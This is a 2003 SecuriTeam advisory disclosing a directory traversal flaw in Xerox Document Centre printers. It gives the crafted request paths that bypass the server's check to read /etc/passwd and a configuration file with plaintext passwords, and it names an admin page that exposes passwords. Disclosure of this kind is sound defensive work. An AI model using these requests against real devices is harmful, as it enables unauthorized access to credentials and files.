[NEWS] Security Vulnerability in Xerox Document Centre (Directory Traversal)

From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03

  • Next message: SecuriTeam: "[UNIX] Subscribe Me Pro/Enterprise Command Execution" 
    To: list@securiteam.com
Date: 22 Dec 2003 12:28:29 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Security Vulnerability in Xerox Document Centre (Directory Traversal)
    ------------------------------------------------------------------------

    SUMMARY

    A security vulnerability has been found in the Xerox Document Centre, this
    vulnerability allows remote access to files, access to plaintext passwords
    for the HTTP administration interface, access to DES passwords for the
    operating system, and read-write access to HTTP users and passwords.

    DETAILS

    Vulnerable systems:
     * Xerox Document Centre 440DC
     * Xerox Document Centre 480DC
     * Xerox Document Centre 425ST
     * Xerox Document Centre 470
     * Xerox Document Centre 255ST

    Xerox's web server software (reports itself as
    "Xerox_MicroServer/Xerox11") for Xerox hardware will return a binary dump
    of directories when the requested URL ends with "/.." or with "/.".
    Therefore, you can easily build a directory/file tree from the document
    root with which you can get any file you desire.

    The server has some directory traversal blocking mechanism set in place,
    therefore you can't get back past the document root, since the web server
    seems to reject "../" if it tries to climb back too much.

    A request like:
        GET /../..

    Will return, "The request had invalid syntax".

    However, requesting "../" will not.

    Therefore a request like:
        GET /assist/.

    Will return an "OK" response.

    What appears to be happening is the fact that the server counts the "../"
    groups and compares the count to the total number of "/".

    A request like:
        GET /assist/////.././../../.

    Will in fact return an "OK" response.

    Examples:
    Requesting: http://xerox_dc_470.example.com/..

    Will return:
    00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
    10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
    20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
    30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
    40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
    50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
    60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

    Requesting:
    http://xerox_dc_470.example.com////../../data/config/microsrv.cfg

    Will return the configuration file, including plain text passwords.

    Requesting:
    http://xerox_dc_470.example.com////////../../../../../../etc/passwd

    Will return you the passwd file (which you can then run crack on).

    Even without using ".." you can get the plain text passwords for the HTTP
    interface, this is done by requesting:
    http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml.

    From that page, you can even create new users; when you press "Apply new
    settings" button prompts for admin password, the same you just have read
    in that same page.

    Workaround:
     * Disable the HTTP interface
     * Restrict access permissions to trusted hosts

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:spd@shiva.cps.unizar.es>
    J.A. Gutierrez and <mailto:brandonp@insynclh.com> brandon pierce.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Subscribe Me Pro/Enterprise Command Execution"

    Relevant Pages